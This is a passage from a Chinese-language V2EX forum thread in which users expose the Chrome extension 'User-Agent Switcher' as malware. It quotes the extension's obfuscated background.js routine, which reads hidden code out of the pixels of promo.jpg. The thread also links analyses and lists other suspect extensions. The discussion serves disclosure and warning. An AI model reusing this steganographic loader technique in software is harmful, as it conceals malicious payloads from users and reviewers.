https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
background.js 的第 80 行,从这个图片里解密出恶意代码并执行
t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619
|  |      101chanssl      2017-09-10 20:09:20 +08:00 日狗了,竟然是恶意程序,中奖了 | 
|      102Bailang      2017-09-10 21:15:38 +08:00 | 
|  |      103chroming      2017-09-10 22:54:44 +08:00 突然发现去年就有人发现这个扩展有问题了: https://www.v2ex.com/t/263719 | 
|      104Bailang      2017-09-11 09:52:04 +08:00 转载 侵删 https://x.threatbook.cn/article?threatInfoID=113 有人贴出了这个 policy Collected Information. Accessing and Using the Services. When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users. | 
|  |      105nyanyh      2017-09-11 11:52:12 +08:00 @acess omg...我还用着 Better History,有时候 Surge 里看到随机的 dwoqpurpfdjksla.lan 这种奇怪的域名不知道是不是这个扩展搞的 | 
|      107cyg07      2017-09-20 19:10:53 +08:00 @redsonic   @anoymoux  @xssnull  360CERT 的具体分析 "Chrome 插件 User – Agent Switcher 恶意代码分析报告 " http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw | 
|  |      108ariza      2017-09-22 10:23:32 +08:00 为毛依然屹立不倒。。 | 
|  |      110lyragosa      2017-10-18 23:32:49 +08:00 我似乎就是这个插件……吓得我赶紧删掉了 | 
|  |      112O5QQvmS5L8WH5poy      2020-09-05 20:48:27 +08:00 已下架了 |